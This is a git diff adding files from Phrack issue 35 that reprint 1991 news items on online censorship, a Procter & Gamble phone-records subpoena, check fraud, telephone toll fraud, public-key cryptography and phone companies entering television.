+restrictions was at solving the Soviet Union's problems.  The best solution is
+to allow what Oliver Wendell Holmes called "the marketplace of ideas" to
+flourish--to get out of the censorship business.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer Network to Ban 'Repugnant' Comments
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Washington Post
+
+     Prodigy has been charged with allowing "antisemitic slurs" to run on its
+network.  Prodigy officials said they would *not* censor discussion of
+controversial subjects, such as the one that has been raging over the net for
+several months -- whether the Holocaust was a hoax.
+
+     The controversial message that was labeled "repugnant" included the
+statements: "Hitler had some valid points...", and "...whenever Jews exercise
+influence and power, misery, warfare and economic exploitation [are the
+result]".  There were six other messages that the Anti-Defamation League of
+B'nai B'rith are complaining about.  The Hitler message was not available to
+all subscribers, it was just personal mail between users.  The person who
+received the mail brought it to the ADL's attention.
+
+     Civil liberties groups have compared computer networks to telephone
+companies, which do not censor calls.  However, Prodigy officials object to
+that analogy, saying it is more like a newspaper, and that Prodigy must judge
+what is acceptable and what is not, much as a newspaper editor must.
+
+     Prodigy officials take the position of, and I quote, "we were speaking in
+broader terms ... we were focused on the broad issue of free expression".
+_______________________________________________________________________________
+
+More on Proctor & Gamble                                        August 15, 1991
+~~~~~~~~~~~~~~~~~~~~~~~
+by Randall Rothenberg (New York Times)
+Further Reading:  Phrack Inc., Issue 33 , File.12, "Proctor & Gamble"
+
+     Law-enforcement officials in Ohio have searched the records of every
+telephone user in southwestern Ohio to determine who, if anyone, called a Wall
+Street Journal reporter to provide information that Proctor & Gamble said was
+confidential and protected by state law.
+        
+     The investigation goes far beyond examining the telephone records of
+current and former employees of the giant consumer products company, an inquiry
+the Hamilton County prosecutor's office confirmed on Monday.  The Journal
+reported the scope of the investigation Thursday.
+
+     The prosecutor, Arthur Ney Jr., acting on a complaint by Procter & Gamble,
+ordered Cincinnati Bell to turn over all the telephone numbers from which
+people called the home or office of the reporter, Alecia Swasy, from March 1 to
+June 15.
+
+     The situation began sometime before June 17 when Procter & Gamble, which
+makes Tide detergent, Crest toothpaste and other familiar supermarket products,
+asked the Cincinnati police to determine whether current or former employees
+were leaking confidential corporate information to The Wall Street Journal.
+
+     On Monday the newspaper reported that the company had been bothered by two
+news articles published on June 10 and June 11 written by Ms. Swasy, a reporter
+based in Pittsburgh who covers Procter & Gamble.  The articles cited
+unidentified sources saying that a senior executive was under pressure to
+resign from the company, and that it might sell some unprofitable divisions.
+
+     But a spokeswoman for Procter and Gamble, Sydney McHugh, said Thursday
+that the company "had been observing a disturbing pattern of leaks" since the
+beginning of the year.  She refused to elaborate, but said the decision to
+pursue legal action was reviewed at several levels in the company and was made
+by Jim Jessee, a corporate security officer.
+
+     Two Ohio statutes protect the unauthorized disclosure of trade secrets.
+One makes it a felony to transmit formulas, customer lists or other tangible
+pieces of information that would be valuable to a company and its competitors.
+But another, broader law makes it a misdemeanor to disclose "any confidential
+matter or information" without the company's consent.
+
+     The Cincinnati police approached the Hamilton County prosecutor's office,
+which sought and received from a grand jury a subpoena for telephone records.
+
+     A copy of the subpoena, dated June 17, was given to The New York Times by
+someone involved in the case who insisted on anonymity.  The subpoena ordered
+Cincinnati Bell to "identify all (513) area code numbers that have dialed" Ms.
+Swasy's home or office telephones in Pittsburgh during an eight-week period
+that started on March 1.
+
+     Cincinnati Bell serves 655,297 telephone numbers in the 513 area code, in
+an area covering 1,156 square miles, said Cyndy Cantoni, a spokeswoman for the
+company.  In the company's entire jurisdiction, which also covers parts of
+Kentucky and Pennsylvania, about 13 million toll calls are placed in an average
+month, she said.
+
+     Ms. Cantoni said she could not comment on what Cincinnati Bell turned over
+to the authorities, but said the company routinely complied with subpoenas.
+Under normal procedure, the company's computers would have automatically
+searched its customer list and printed out only the originating numbers, and
+not the names or addresses, of calls to Ms. Swasy's numbers, Ms. Cantoni said.
+
+     The Wall Street Journal, which is published by Dow Jones & Co., reported
+on Monday that neither Ms. Swasy nor executives at the Journal were informed of
+the subpoena by the authorities.
+
+     Neither Terry Gaines, a first assistant prosecutor, nor Ed Ammann, a
+police department colonel involved with the investigation, returned repeated
+calls to their offices.
+
+     Alan F. Westin of Columbia University, an authority on technology and
+privacy issues, said the legality of the Ohio authorities' search for the
+Procter & Gamble whistleblower may depend on how the investigation was pursued.
+
+     If Procter & Gamble turned over the names and phone numbers of present and
+former employees to the police and the police matched that list against the
+numbers they were given by the telephone company, the rights of other,
+uninvolved parties may not have been violated, Westin said.  But if the police
+learned the names of people unaffiliated with Procter & Gamble who called the
+Journal's reporter, he said, or if they turned over a list of numbers to
+Procter & Gamble for research, some Ohio residents' Fourth Amendment
+protections may have been sullied.
+
+     "When technology allows you to run millions of calls involving 650,000
+telephone subscribers through a computer in order to identify who called a
+person, potentially to find out whether a crime was committed, you raise the
+question of whether technological capacity has gone over the line in terms of
+what is a reasonable search and seizure," Westin said.
+_______________________________________________________________________________
+
+Expert Fraud Shares Tricks of His Trade                         October 7, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Bob Reilly (New York Times)
+
+     PHOENIX -- A freelance writer didn't think the $333 that Forbes magazine
+paid him for a one-page article was enough money so he used his personal
+computer to duplicate the check in the amount of $30,000.  And, the check
+cleared.
+
+     A handyman fixes a bedroom window and gets paid by check.  The handyman
+copies down the homeowner's bank account number, name, address and check number
+sequences and sends $4.95 to a company that prints fancy colored checks.  The
+handyman masters the homeowner's signature and then proceeds to cash the checks
+after they arrive.
+
+     American Express and Mastercard traveler's checks are duplicated on a
+colored photostat machine and spent in hotels and restaurants.
+
+     A man rents a banquet room in a hotel for $800 and gets the bill in the
+mail a few days later.  The man sends in a check for $400 with the notation
+"paid in full" written in the lower left-hand corner.  The hotel cashes the
+check and sends a notice to the man saying $400 is still owed.  The man refuses
+to pay the $400 and wins in court because the law says by cashing the check the
+hotel conceded the debt was paid.
+
+     White-collar crime amounts to more than $50 billion a year, said Frank
+Abagnale, who cited the examples at a business-sponsored seminar in the Phoenix
+Civic Center.  By contrast, bank robbers, who get most of the media attention,
+abscond with a paltry $450 million, he said.
+
+     Abagnale is said to have conducted scams and frauds in 26 nations.  Known
+as "The Imposter," he now advises government and industry.  He says he served
+six years in jail in France, Sweden and the U.S. for his crimes, which included
+writing bad checks for more than $2.5 million.
+
+     "As technology improves, so does the ability to commit fraud," said
+Abagnale.
+
+     He claims that at 16 he impersonated an airline pilot, at 18 was a chief
+resident pediatrician in a Georgia hospital, at 19 passed the Louisiana state
+bar exam and served as an assistant attorney general for the state.
+
+     Abagnale also claims he never flew an airplane or treated a patient but
+along the way used false names to get jobs and pass bad checks.  He claims he
+even got a job at age 20 teaching sociology at Brigham Young University,
+beating out three Ph.D.s for the job.
+
+     "I was always just one chapter ahead of the class," he said.  Demeanor,
+style, confidence, clothes and the overt display of wealth also help the con
+man, Abagnale said.
+        
+     Abagnale claimed he got one teller to cash a napkin because he drove up to
+the bank in a chauffeur-driven Rolls Royce and entered wearing a $600 suit and
+all the confidence of a billionaire.  The feat was recorded for television by
+CBS, he said.
+
+     Another time he supposedly put the numbers of the bank account he was
+using on a bunch of deposit slips, placed the deposit slips in a bank for
+public use, and in one day alone more than $40,000 was deposited into his
+account by unsuspecting customers who picked up his slips because they had
+either run out of their own or hadn't yet got their own deposit slips.
+  
+     Abagnale asserted that there are several ways to discourage fraud, 
+including:
+
+       -- Use checks that are impossible to duplicate on a home computer.
+       -- Don't cash checks that don't have at least one rough edge.
+       -- Scan travelers checks by looking for impossible to reproduce
+          pictures or symbols that can only be seen at eye level or by
+          wetting the back, left-hand side of an American Express traveler's
+          check, which will smudge if it is authentic.
+
+     Abagnale is known as the author of a book called "Catch Me If You Can."
+
+     "I always knew I would eventually get caught," he said.  "Only a fool
+believes he won't.  The law sometimes sleeps, but it never dies."
+
+     Abagnale claimed he started a life of crime when his parents divorced and
+he was forced to choose between living with his mother or father.  He said he
+couldn't make the choice and ran away.
+_______________________________________________________________________________
+       
+Dumb Jocks Learn First Lesson of Phreaking                     October 17, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Associate Press
+
+     Four current Ball State University basketball players have admitted to
+investigators that they charged a total of $820.90 in unauthorized long
+distance calls. School officials announced the preliminary findings in the
+first phase of their report the the NCAA.  What the investigators found, in
+regards to the unauthorized calls, was the following information:
+
+Person             Yr   Calls  Cost
+~~~~~~~~~~~~~~~~ ~~~  ~~~~~  ~~~~~~~
+Jeermal Sylvester  Sop  255    $769.93
+Chandler Thompson  Sen  28     $ 45.14
+Michael Spicer     Sen  3      $  4.43
+Keith Stalling     Sen  1      $  1.40
+
+     Investigators reported three of the men said former players had provided
+the long distance credit card numbers or authorization codes on which the calls
+were made.  The fourth player Keith Stalling, could not explain how his call
+had been charged to the university.  Head basketball coach Dick Hunsaker
+reiterated that neither he nor the coaching staff had made available the
+numbers that were assigned to the coaches.
+
+     "When this problem was first discovered back in August, it came as a shock
+to me," Hunsaker said.  "I'm disappointed with the judgement of the players
+involved, but I'm glad we're getting to the bottom of it quickly and clearing
+it up before the season starts."
+
+     "Our attention now will focus on former players and other people not
+connected with the basketball program who might have used the same credit cards
+and access numbers," said the university's auditor.  The investigation that
+began in August was conducted by the Ball State university's auditor and
+Department of Public Safety.  The investigation started one week after a
+routine review of telephone records by athletic department officials.  At the
+time, investigators said the total cost of the unauthorized calls was in the
+thousands of dollars.
+_______________________________________________________________________________
+
+Silicon Government in California                               October 28, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From UPI Sacramento
+
+     California unveiled an easy-to-use computer system Wednesday that is
+designed to tell people about such topics as statewide job openings, where
+parents can find child care and how to re-register a car.
+
+     Officials described the experimental "Info/California" program as an
+information-dispensing version of an automatic teller machine at a bank.  It
+will operate in Sacramento and San Diego as a pilot project for the next nine
+months.
+
+     Users will obtain free information on a variety of state services as they
+touch the television-like computer screen to evoke an on-screen narration and
+color graphics in English, Spanish and potentially other languages.
+
+     "It literally puts state government at our fingertips," a computerized
+image of Gov. Pete Wilson said at a Capitol news conference.
+    
+     Secretary Russell Gould of the Health and Welfare Agency said the system
+may be especially useful to announce job openings as the economy rebounds from
+the recession. Job-seekers will need a fourth-grade literacy level to use the
+machine, which will refer them to Employment Development Department offices for
+follow-up.
+
+     Director Frank Zolin of the Department of Motor Vehicles said the system
+will benefit 20 million drivers who want vehicle registration renewals, vanity
+license plate orders and faster service.
+
+     John Poland, Central California manager for IBM -- the state's partner in
+the project -- said that besides telling the public about job opportunities, it
+will allow Californians to order birth certificates and get information about
+education, transportation, health and welfare at more than one site.
+
+     During the nine-month trial, people will use the system at 15 kiosks in
+Sacramento and San Diego that will be similar to, and eventually integrated
+with, local system kiosks such as those in the courts in Los Angeles and Long
+Beach, and for community services in San Diego and Tulare counties.
+
+     Info/California was authorized under 1988 legislation. It is based on an
+experimental touchscreen network in Hawaii that 30,260 people used over a six-
+month period.
+
+     The state spent about $300,000 on the project, and IBM invested about $3
+million to develop the technology.  By performing functions now done by humans,
+the system may ultimately replace some state workers and produce cost savings
+for taxpayers.
+
+     "We're working smart here," Gould said.  "This may diminish some of the
+need for new state workers."
+_______________________________________________________________________________
+
+Digital Tapes Deal Endorsed by Music Industry                  October 30, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From (Congressional Monitor)
+
+     Record industry executives joined with retailers and consumer groups in
+endorsing legislation (S 1623) that would pave the way for widescale
+introduction of digital audio tapes into the U.S. marketplace.
+
+     For the first time, consumers would be allowed to legally make copies of
+prerecordings for home use.
+
+     The agreement would allow artists, songwriters, and record companies to
+collect royalty fees on the sale of blank tapes and digital audio recorders.
+
+     In addition, an electronics chip will be placed in the recorders to
+prevent anything other than the original recording to be copied.
+
+     In testimony before the Senate Judiciary Committee's Subcommittee on
+Patents, Copyrights, and Trademarks, pop star Debbie Gibson said that many
+artists had been concerned that digital copying could spell the end of a
+profitable music industry.
+
+     Unlike conventional tapes, digital audio recorders allow consumers to make
+a perfect copy of a prerecording.  The record industry says it already loses $1
+billion a year in sales due to illegal copying.  And, the industry says,
+unchecked digital technology would dramatically increase that figure.
+
+     Electronics manufacturers and retailers won the assurance that they will
+not be sued for copyright infringement due to the sale of blank tapes or
+recorders.
+_______________________________________________________________________________
+
+Computer Cryptography:  A Cure For The Common Code
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+     Anyone can sign a postcard, but how do you sign a piece of electronic
+mail?  Without a "signature" to demonstrate that, say, an electronic transfer
+of funds really comes from someone authorized to make the transfer, progress
+towards all-electronic commerce is stymied.  Ways of producing such signatures
+are available, thanks to the technology of public-key cryptography.  They will
+not work to everyone's best advantage, though, until everyone uses the same
+public- key system.
+
+     It is an obvious opportunity for standards-makers -- but in America they
+have turned up their noses at all the variations on the theme currently in use.
+The alternative standard for digital signatures now offered by America's
+National Institute of Standards and Technology (NIST) has brought a long-
+simmering controversy back to the boil.
+
+     Public-key cryptography could become one of the most common technologies
+of the information age, underpinning all sorts of routine transactions.  Not
+only does it promise to provide the digital equivalent of a signature, it could
+also give users an electronic envelope to keep private messages from prying
+eyes.  The idea is to create codes that have two related keys.  In conventional
+cryptography the sender and receiver share a single secret key; the sender uses
+it to encode the message, the receiver to decode it.
+
+     In public-key techniques, each person has a pair of keys: a disclosed
+public key and a secret private key. Messages encoded with the private key can
+only be decoded with the corresponding public key, and vice versa.  The public
+keys are published like telephone numbers. The private keys are secret.  With
+this technology, digital signatures are simple. Encode your message, or just
+the name you sign it with, using your private key.  If the recipient can decode
+the message with your public key, he can be confident it came from you.
+Sending a confidential message -- putting electronic mail in a tamper-proof
+envelope -- is equally straightforward.
+
+     To send a secret to Alice encode it with her public key.  Only Alice (or
+someone else who knows her private key) will be able to decode the message.
+The heart of any system of public-key cryptography is a mathematical function
+which takes in a message and a key, and puts out a code.  This function must be
+fairly quick and easy to use, so that putting things into code does not take
+forever.  It must be very hard to undo, so that getting things out of code does
+take forever, unless the decoder has the decoding key.  Obviously, there must
+be no easy way to deduce the private key from the public key.  Finding
+functions that meet these criteria is "a combination of mathematics and
+muddle," according to Roger Needham of the Cambridge Computer Laboratory.
+
+     The greatest successes to arise from the muddle so far are those using
+functions called prime factorisation algorithms.  They are based on the
+mathematical insight that, while it is easy to multiply two numbers together,
+it is very hard to work backwards to find the particular two numbers which were
+multiplied together to produce some given number.  If Alice chooses two large
+prime numbers as her private key and publishes their 150-digit product as her
+public key, it would probably take a code-breaker thousands of years to work
+backwards to calculate her private keys.
+
+     A variety of schemes have been worked out which use this insight as the
+basis for a workable public-key code.  Most popular of these is the so-called
+RSA algorithm, named after the three MIT professors who created it -- Ronald
+Rivest, Adi Shamir and Len Adleman.  It has been patented and is sold by a
+Silicon Valley company, called RSA, that employs 15 people, most of them ex-MIT
+graduate students.  Faculty firms are to computer start-ups what family firms
+were to the industrial revolution.  RSA has attracted both academic praise and
+a range of heavyweight commercial customers: Microsoft, Sun Microsystems,
+Digital Equipment and Lotus Development. But, despite repeated applications, it
+has never been endorsed by those in government.  Rumors abound that the
+codebreakers in the National Security Agency have discouraged standard-setters
+from recommending RSA because they do not want to promote the use of codes they
+cannot break.  RSA, for obvious reasons, does not discourage the rumors.
+Whatever the reason, the standard-setters at the NIST have sidestepped the
+debate over RSA with their new algorithm, DSA.  As set out in the standard, DSA
+verifies the identity of the sender, but does not encrypt the message.  It
+appends to the message a number calculated from the message and the sender's
+private key.  The recipient can then use this number, the message and the
+sender's public key to verify that the message is what it seems.
+
+     The NIST says that this technique is well suited to "smart cards" and
+other applications where there is not a lot of computing power available for
+working out codes.  Because it hopes that DSA will be used for verifying the
+identity of everyone from welfare recipients to military contractors, its
+flexibility is a boon.  Meanwhile, however, more and more companies are
+choosing a public-key cryptography system for communicating confidentially --
+often RSA, sometimes something different. Someday, probably soon, governments
+will want to choose, too.  Watch out for fireworks when they do.
+_______________________________________________________________________________
+
+SWBT Sends Off First "Cross-Country" ISDN Call
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Southwestern Bell Telephone
+
+     The nation's first "cross-country" public network ISDN was placed last
+week, courtesy of SWBT.  The historic first call was the result of a two-year
+joint effort among SWBT, BellSouth Corp., US Sprint and Bellcore.  SWBT's
+Advanced Technology Lab originated the call, which used US Sprint's digital
+facilities in Burlingame, Calif.  The call terminated at a BellSouth switch
+in Atlanta, Ga.
+
+     Using an ISDN video application, SWBT's trial director Ken Goodgold was
+able to see and talk to BellSouth's David Collins.  "With this test, the
+geographic limits of ISDN-based services were stretched from a few miles to
+cross-country," Goodgold says.  "We began with protocol testing and service
+verification, two key parts of the process," Goodgold says. "That required an
+extremely complex series of technical tests.  The Advanced Technology Lab staff
+worked for months performing the tests leading up to the first successful
+call."
+
+     Last week's test call was significant from a marketing perspective as well
+as a technical one.  That's because it demonstrated the economic benifits of
+using ISDN for video information.  "The cost of a long distance call is
+approximately the same, whether it's a voice transmission using a regular phone
+line or a video transmission using ISDN," Goodgold says. "That means a big
+reduction in cost to arrange a videoconference." US Sprint joined the test
+because ISDN has evolved beyond the local stage, says Terry Kero, the carrier's
+director of InfoCom Systems Development Labs.  "After today, it will be
+technically possible to make an ISDN call across the country just as it is
+possible today to make a regular long distance call," Kero says.
+_______________________________________________________________________________
diff --git a/phrack35/13.txt b/phrack35/13.txt
new file mode 100644
index 0000000..6397805
--- /dev/null
+++ b/phrack35/13.txt
@@ -0,0 +1,425 @@
+                               == Phrack Inc. ==
+
+                 Volume Three, Issue Thirty-five, File 13 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue XXXV / Part Four            PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+The Media Monopoly
+~~~~~~~~~~~~~~~~~
+by Dispater
+
+     As we all know, more technology means more and more legal questions.  It
+is important not only to understand the economic but social impacts of the
+recent "Telco-TV" issue.  I think technologically the idea of transmitting
+audio/video signals through phiber optic line is fascinating and a great
+technological triumph.  However, how will society benefit by having an even
+smaller number of owners controlling the media?  There is already a media
+dynasty due to policies established in Ronald Reagan's presidency.
+
+     Today almost all of the media is controlled by 18 global corporations.
+That is down from 23 in 1990 and down from 50 corporations in 1983.  The trend
+is very scary.  In the United States there are around 25,000 different media
+voices.  This includes newspapers, book publishers, television stations, radio
+stations, movie studios, and magazines.  However we should not kid ourselves
+into thinking that there are 25,000 different owners.  Is it fair to that 23
+companies have so much power over our lives?  It is incredibly dangerous to
+allow this trend to continue.  We must stop this trend and "bust up" the media
+as it was done in the pre-Reagan era.
+
+    If you are concerned about this issue I strongly urge you to read "The
+Media Monopoly" by Ben Bagdickian.  It is published by Beacon Press and runs
+around 300 pages in length.
+_______________________________________________________________________________
+
+Phone Companies Could Transmit TV Under FCC Plan               October 25, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Edmund L. Andrews (The New York Times)
+
+     In a surprising and controversial move to promote cable television
+competition, the Federal Communications Commission proposed today that local
+telephone companies be allowed to package and transmit television programming.
+
+      The proposed rules, which were unanimously endorsed and are likely to be
+adopted within a year, would expose cable companies to the most threatening
+competition yet.  But they could benefit cable television consumers, many of
+whom have seen their bills double and triple in recent years.
+
+      The cable industry vowed to fight the proposals and threatened to
+challenge the rules in court if they are adopted.  Telephone companies, eager
+to enter a lucrative new business, applauded.
+
+     "Today's action will create competition and offer consumers more choices,"
+said James R. Young, vice-president of regulatory and industry relations at the
+Bell Atlantic Corporation.  "Let's hope it's a beginning to the end of turf
+wars."
+
+     In essence, the commission recommended that telephone companies be allowed
+to offer "video dial tone" over telephone lines that would carry programming
+produced by outside companies.  Consumers could view whatever programs they
+pleased and would be charged accordingly.
+
+     Initially, telephone companies would serve primarily as a pipeline, not
+producing the programs.  But the commission said telephone companies should
+also be allowed to organize and package video services, as long as they make
+their networks available to all programmers.  The commission also opened an
+inquiry on whether to let telephone companies produce programs.
+
+     The idea of allowing so-called video dial tone service has long been a
+favorite of the FCC's chairman, Alfred C. Sikes.  Congress, which is weighing
+regulatory legislation to rein in cable process has shied away from the issue.
+Today's action makes it more likely that lawmakers will have to reconsider the
+role of telephone companies in television.
+
+     Before cable companies would feel much impact from today's FCC proposal,
+however, most telephone companies would have to spend billions of dollars to
+install new fiber-optic transmission lines and switching equipment that could
+carry large volumes of television material.  Analysts have estimated that the
+cost of converting every home in the country to a fiber-optic line would be
+$100 billion to $200 billion and that it would take at least five years.
+
+     Most large telephone companies, including all of the regional Bell
+companies, already plan to replace their copper wires with fiber over the next
+two decades.  The immense business opportunity posed by the $18 billion cable
+television market is likely to accelerate those plans.
+
+     High-capacity communications lines that reach every home in America could
+radically alter the distribution of entertainment and enable people on home
+computers to tap distant libraries and obtain information in seconds.
+
+     "Both program providers and consumers would have chances they don't have
+today, without the bottlenecks provided by cable companies and without the
+bottlenecks of broadcasting," said Richard Firestone, chief of the FCC's common
+carrier bureau.
+
+     The move was immediately attacked by the National Cable Television
+Association, which threatened to challenge any new rules in court.
+
+     "Until and unless the telco's monopoly in voice telephone is ended, no
+level of Government safeguards against cross-subsidies will be effective," said
+James P. Mahoney, president of the cable association.
+
+     The most controversial issue, which the FCC raised for discussion without
+recommendation, is whether telephone companies should be allowed to produce
+programming, a much bigger business than transmission.  Many Bush
+Administration officials favor such a move, but television broadcasters and
+producers bitterly oppose it.  Officials noted that such a shift would require
+changes in the Cable Television Act of 1984.
+
+     "Among the top two or three concerns of ever cable operator has always
+been head-to-head competition against local telephone companies," said John
+Mansell, a senior analyst at Paul Kagan Associates, a marketing-research firm
+that monitors the cable industry.
+
+     For telephone companies, the move could be a windfall.  Steven R.  Sieck,
+vice president of Link Resources Inc., a market-research firm in New York,
+said, "It's by far the largest market opportunity among the whole collection of
+information services" for telephone companies.
+
+     It remains unclear, however, whether the new rules will survive in court.
+The Cable Television Act of 1984 bars a telephone company from owning a cable
+television franchise in the same market.  The FCC ruled today, however, that
+the law does not prevent a local telephone company from transmitting programs
+produced by other companies and that it does not bar long-distance carriers in
+any way.
+
+     The Bell companies have lobbied strongly for legislation that would allow
+them to enter the cable business, and several companies have invested in
+European cable franchises.  In addition, Pacific Telesis Group, which provides
+local phone service in California, already holds an option to buy a controlling
+interest in a Chicago cable franchise, which could be [sic] permissible since
+it is outside the company's telephone area.
+
+     The commission also handed down a ruling that could give telephone
+companies an important price advantage in future competition with cable
+operators and could prompt protests from local governments, ruling that neither
+a telephone company nor a video programmer needs to pay franchise fees to local
+governments.
+
+     Under the cable act, by contrast, local governments can charge cable
+operators a franchise fee as high as five per cent of revenues.
+
+     Explaining today's ruling, Mr. Sikes said, "We have segregation laws, and
+these segregation laws should be ended."  He added that some cable companies
+were already installing optical fibers in their own networks, and that some
+were exploring the option of using their networks to offer telephone service.
+
+     The proposals mark the second major change in longstanding restrictions on
+the telephone companies' ability to move into new services.  Less than three
+weeks ago, a Federal appeals court cleared the way for the regional Bell
+companies to begin providing information services, like news, stock and sports
+tables, immediately.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Phiber Optic or Twisted Pair?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John J. Keller (Wall Street Journal)                        October 28, 1991
+                
+     Expanding the nation's telephone network into a vast television broadcast
+system is going to cost tens of billions of dollars and won't be finished
+before the end of the decade, say executives at some of the largest phone
+companies.
+
+     But the scale of the project isn't stopping the phone giants, such as GTE
+Corp., Ameritech, Bell Atlantic Corp., and Pacific Telesis Group, from
+methodically exploring how to implement such a system.
+
+     The Baby Bells and GTE have spent several million dollars testing new
+systems that carry cable TV shows into homes via the phone network.  The phone
+companies will spend many million of dollars more before they are satisfied
+that they have a service that matches the current voice phone system and tops
+today's entrenched cable TV monopolies.
+
+     Last week the phone companies were buoyed by a Federal Communications
+Commission plan to support a new technology called video dial tone, that would
+put the big phone companies into direct competition with local cable-television
+monopolies.
+
+     Phone subscribers could use such a system to dial up and order video
+programs from an entertainment company through the same wire that connects a
+typical phone call.  More important, allowing the phone companies could
+generate enough traffic to fund "broadband" upper-capacity information highways
+that could someday carry TV, medical information, and even FM stereo channels
+into a home through a single wire, say the executives.
+
+     However, big hurdles remain.  The FCC hasn't decided whether to let the
+phone companies participate in the programming end of the cable TV business.
+The phone companies argue that's a financial necessity, because cable TV
+companies would be reluctant to share the programs they now support and run
+them over a rival's network.  In addition, the 1984 Cable TV Act, which
+prohibits phone company participation in the cable business, would have to be
+rewritten.
+
+     "We're encouraged by the FCC action, but it's not as complete a step as
+there needs to be made," said Larry J. Sparrow, vice president of regulatory
+and governmental affairs at GTE Telephone Operations, Irvine, Texas.  Adds
+Kathleen Ahren, Nynex Corp.'s director of federal regulatory policy: "For us to
+build facilities without anyone to use them would be irresponsible...
+programming is essential."
+
+     There are also technical issues such as whether TV service to the home
+should be provided through a cable-TV-like coaxial cable or advanced fiber-
+optic line.  Either would require pulling out existing "twisted pair" wiring
+that now binds the phones in homes and most small businesses to the local phone
+network.  Moreover, the phone industry must still hammer out technical
+standards for melding video transmission, which requires tremendous
+transmission capacity, with voice traffic, which uses far less.
+
+     The system that is finally built will require mountains of capital to
+transform the existing phone network into a high-capacity phone network of
+systems that pump signals digitally through fiber-optic transmission lines,
+which are glass wires.  "We've seen figures that it would cost about $250
+billion nationwide," says James R. Young, vice president of regulatory and
+industry relations at Bell Atlantic.  Adds Ms. Ahern, "I don't think our plans
+would have us doing this in less than 20 years and if we do you're talking
+billions of dollars."
+
+     Pacific Bell, which spends about $1 billion a year on new network
+equipment, would see that annual tab jump by two to three times in the first
+several years of constructing a broadband network, says Michael Bloom, customer
+premise, broadband applications at the San Francisco-based unit of Pacific
+Telesis Group.  But he notices that as equipment purchases grow and the
+technology is perfected the annual cost should drop down to current levels
+after about four years.
+
+     PacBell, like most other phone companies, already has installed fiber-
+optic "trunking" lines to carry bulk traffic between its switching centers.
+ It has also begun replacing copper facilities in some neighborhoods, running
+optical fibers to the pedestal at the curb and then connecting to the regular
+phone home wires.  Someday these lines will carry cable TV, but for now
+regulation restricts the phone company to voice and data transmission, says Mr.
+Bloom.
+
+     Someday this will change, says the FCC, which envisions a service where
+phone customers would turn on their TVs and find a listing of TV shows, movies,
+news and other programs, supplied by the phone company and other programmers
+and accessible via remote control.
+
+     Several phone companies are already testing such services.  In Cerritos,
+Calif., GTE has built an elaborate network of fiber-optic and coaxial cables
+lines and advanced switching systems to deliver TV services to several thousand
+customers.  One service, called "Main Street," allows a customer with a remote
+control to shop via TV, check a bank account and even seek information on
+colleges in the US.  Another service, dubbed "Center Screen," lets 3,900
+residential customers call for a movie or a TV show by dialling a special
+number.  A third service lets some customers talk to one another through a
+videophone in the house.
+
+     "We've found [from the Cerritos tests] that our customers like full-motion
+video and not still pictures," which is all that's possible over today's
+regular phone lines, Mr. Sparrow says.
+
+     That's because regular conversation travels over phone lines at the rate
+of 64,000 bits a second.  By contract, "reasonable quality" video, such as the
+kind that appears from a VCR tape, requires transmission capacity of at least
+1.3 megabits to 1.5 megabits a second.  High quality video will take capacity
+of 45 megabits to 90 megabits a second, he says.  A megabit equals 1 million
+bits.
+
+     To save money and get as much capacity out of the existing copper-based
+systems, Bell Communications Research, the Baby Bell's research arm, has
+developed "video compression" technology which uses existing copper wire to
+deliver TV to the home.  With video compression, a microprocessor squashes
+video signals so they can be sent through a regular phone line at the rate of
+1.5 megabits a second.  The little chip, which is in an electronic box attached
+to the phone line, looks at an incoming video signal, and filters out the parts
+of the moving image that are redundant.  The chip codes and sends the parts of
+the signal that are different through the phone line to a receiving box, which
+decodes and reconstructs the image before projecting it onto the TV screen.
+
+     The cable companies hope to retaliate by providing phone service through
+their cable networks.  They are funding research to develop switching systems
+that can pass phone calls from one cable subscriber to another and out to
+customers using the regular phone system.
+
+     But the blood between the industries isn't all bad.  Ameritech's Indiana
+Bell subsidiary and Cardinal Communications, an Indiana cable TV operator, are
+testing a fiber distribution system made by Broadband Technologies Inc, of
+Raleigh, NC.  The system is being used to route video and phone signals over
+backbone fiber-optic lines and finally through coaxial and twisted pair lines
+attached to homes in Tipton Lake, a Columbus, Ind. residential development.
+Bell Atlantic is negotiating with Loudon Cablevision, a cable TV company in
+Loudon County, Va., to test the transmission of TV signals through phone
+company lines to 5,000-6,000 homes in The Cascades, a local housing
+development.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Baby Bells as Big Brother                                      November 2, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~
+>From The New York Times
+
+     Two official decisions in October, one liberating and the other
+frightening, may shape telecommunications -- and America -- for decades.  The
+liberating decision, by the Federal Communications Commission, proposes to
+allow the seven regional telephone companies to transmit TV programs.
+
+     If implemented, that proposal for video-by-phone would free families to
+tell cable operators, if they misbehave, to get lost.
+
+     The frightening decision, by a federal appeals court, unblocked the same
+seven "Baby Bell" companies from owning electronic yellow pages, video shopping
+and other information services.
+
+     Unless Congress intervenes, this decision will allow the Baby Bells to
+exploit their monopolistic stranglehold over residential phone lines and
+dictate what information reaches nearly every home.  The same principle ought
+to govern in both situations: democracy needs diversity.
+
+     Technological advances have brought the nation to a regulatory crossroad.
+A single information pipeline -- perhaps fiber-optic cable, perhaps enhanced
+coaxial or copper wire -- may soon pour an unimaginable array of phone, video
+and data communications into homes.  Whoever controls the pipeline controls
+access to American minds.
+
